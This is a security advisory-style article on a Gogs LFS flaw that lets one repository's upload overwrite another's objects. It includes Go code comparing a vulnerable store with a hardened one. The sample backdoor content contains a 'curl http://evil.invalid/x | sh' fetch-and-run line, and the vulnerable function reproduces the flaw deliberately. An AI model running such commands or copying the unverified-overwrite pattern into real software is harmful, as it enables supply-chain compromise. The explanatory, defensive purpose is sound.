The Gogs project, a popular self-hosted Git service prized for its simplicity and painless setup, has been hit by a critical security flaw that could turn trusted repositories into delivery vectors for malware. CVE-2026-25921, sporting a severe CVSS score of 9.3, exposes a fundamental weakness in how Gogs handles Large File Storage (LFS).
The core of the issue is a lack of isolation between repositories: Gogs stores every LFS object from every repository in one shared directory, and the repository ID is not part of the storage path.
The risk comes from two failures that compound each other:
- Path collision: the on-disk path is derived solely from the object's OID (Object ID, the SHA-256 of its content), so an upload from any repository that claims a given OID is written to the same file, whichever repository first stored it.
- Missing content hash verification: Gogs does not check that the bytes of an uploaded LFS object actually hash to the SHA-256 the client claims as the OID, so the OID is merely a name the client chooses rather than a proof of the content.
As the advisory notes regarding the underlying code: “Gogs does not verify uploaded LFS file content against its claimed SHA-256, meaning attackers can manipulate the uploaded file like injecting backdoor.”
The vulnerability is made worse by an architectural assumption that client retries are always benign. A comment in the source code says it is “OK” to leave a partial file behind because a retry will “safely overwrite” it, which is only true if the OID uniquely identifies the content and every client is honest. As the advisory puts it, “this assumption does not hold in the case of a malicious client”: an attacker can deliberately supply the OID of an object they do not own and overwrite it with content of their choosing.
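To make the two failures and the "safe overwrite" assumption concrete, here is an added example in Go (the language Gogs is written in) that is not Gogs' own code: a minimal object store that reproduces the flawed pattern beside a hardened one. The vulnerable store keys the path on the client-supplied OID alone and lets any later upload overwrite the file; the hardened store verifies SHA-256(content) == OID before committing the file and, as defence in depth beyond the hash check the advisory describes as the fix, also scopes the path to the repository ID. The function names, the two sample objects and the repository IDs are constructed for the demonstration.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
)

var (
	// An LFS OID is the lowercase hex SHA-256 of the object bytes; the regexp also keeps
	// anything that is not hex (path separators included) out of filepath.Join.
	oidPattern     = regexp.MustCompile(`^[a-f0-9]{64}$`)
	ErrBadOID      = errors.New("lfs: malformed OID")
	ErrOIDMismatch = errors.New("lfs: content does not hash to the claimed OID")

	// Constructed sample objects: repository 1's legitimate file and the replacement an
	// attacker who controls repository 2 uploads under the same OID.
	LegitContent    = []byte("#!/bin/sh\necho build-tool 1.0\n")
	BackdoorContent = []byte("#!/bin/sh\ncurl http://evil.invalid/x | sh\n")
)

// OID computes the LFS object ID for content.
func OID(content []byte) string {
	sum := sha256.Sum256(content)
	return hex.EncodeToString(sum[:])
}

// vulnerablePut is the flawed pattern: one directory shared by every repository, a
// path derived only from the client-supplied OID, and no check that the bytes hash to
// that OID. A later upload with the same OID silently overwrites the earlier one.
func vulnerablePut(root, oid string, content []byte) error {
	if err := os.MkdirAll(root, 0o700); err != nil {
		return err
	}
	return os.WriteFile(filepath.Join(root, oid), content, 0o600)
}

// hardenedPut refuses the upload unless SHA-256(content) == oid. As defence in depth it
// also keys the path on the repository ID, and it writes to a temp file that is renamed
// into place only after the check, so a partial or mismatched upload never replaces a
// good object.
func hardenedPut(root string, repoID int64, oid string, content []byte) error {
	if !oidPattern.MatchString(oid) {
		return ErrBadOID
	}
	if OID(content) != oid {
		return ErrOIDMismatch
	}
	dir := filepath.Join(root, fmt.Sprintf("%d", repoID))
	if err := os.MkdirAll(dir, 0o700); err != nil {
		return err
	}
	tmp, err := os.CreateTemp(dir, "upload-*")
	if err != nil {
		return err
	}
	_, werr := tmp.Write(content)
	if cerr := tmp.Close(); werr != nil || cerr != nil {
		os.Remove(tmp.Name())
		return fmt.Errorf("lfs: storing %s: write=%v close=%v", oid, werr, cerr)
	}
	return os.Rename(tmp.Name(), filepath.Join(dir, oid))
}

// Demo stores repository 1's object, replays the attacker's upload from repository 2
// against both stores in a scratch directory, and returns what the shared store now
// serves for the OID, the error the hardened store gave the attacker, and what the
// hardened store still serves to repository 1.
func Demo() (shared []byte, rejected error, isolated []byte, err error) {
	root, err := os.MkdirTemp("", "lfs-demo-")
	if err != nil {
		return nil, nil, nil, err
	}
	defer os.RemoveAll(root)
	oid := OID(LegitContent) // the OID repository 1 legitimately owns
	sharedDir := filepath.Join(root, "shared")
	if err = vulnerablePut(sharedDir, oid, LegitContent); err != nil {
		return nil, nil, nil, err
	}
	if err = vulnerablePut(sharedDir, oid, BackdoorContent); err != nil { // attacker's "retry"
		return nil, nil, nil, err
	}
	if shared, err = os.ReadFile(filepath.Join(sharedDir, oid)); err != nil {
		return nil, nil, nil, err
	}
	isoDir := filepath.Join(root, "isolated")
	if err = hardenedPut(isoDir, 1, oid, LegitContent); err != nil {
		return nil, nil, nil, err
	}
	rejected = hardenedPut(isoDir, 2, oid, BackdoorContent) // attacker's upload
	isolated, err = os.ReadFile(filepath.Join(isoDir, "1", oid))
	return shared, rejected, isolated, err
}

func main() {
	shared, rejected, isolated, err := Demo()
	fmt.Printf("shared store serves: %q\nhardened store told attacker: %v\nhardened store serves: %q\nerr: %v\n",
		shared, rejected, isolated, err)
}
```

Running it shows the shared store handing repository 1's users the attacker's bytes, while the hardened store rejects the upload with ErrOIDMismatch and keeps serving the original. Note that the hash check alone closes the integrity hole, because an upload that does pass it carries exactly the bytes the OID already names; the per-repository path is there so that a future bug in the check cannot again let one repository's upload reach another's object.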
This flaw opens the door to devastating supply-chain attacks.
An attacker who can upload LFS objects to any repository on the instance (their own is enough) can overwrite objects belonging to other repositories, for example large binaries, datasets or media, simply by uploading their own content under a victim object's OID.
When a legitimate user then downloads the affected object from the Gogs web interface, nothing warns them that the content has changed (a git-lfs client compares the downloaded bytes against the OID, but a browser download does not).
Every LFS object hosted on an unpatched Gogs instance can be replaced this way.
The Gogs team has fixed the issue in its latest release, and administrators are urged to upgrade immediately. The fix verifies each uploaded LFS object against its claimed SHA-256 before storing it, so tampered content can no longer be written under a legitimate OID. Because the fix applies to new uploads, administrators should also audit what is already on disk: hashing each stored object and comparing the result with the OID it was stored under will reveal any object that was replaced before the upgrade.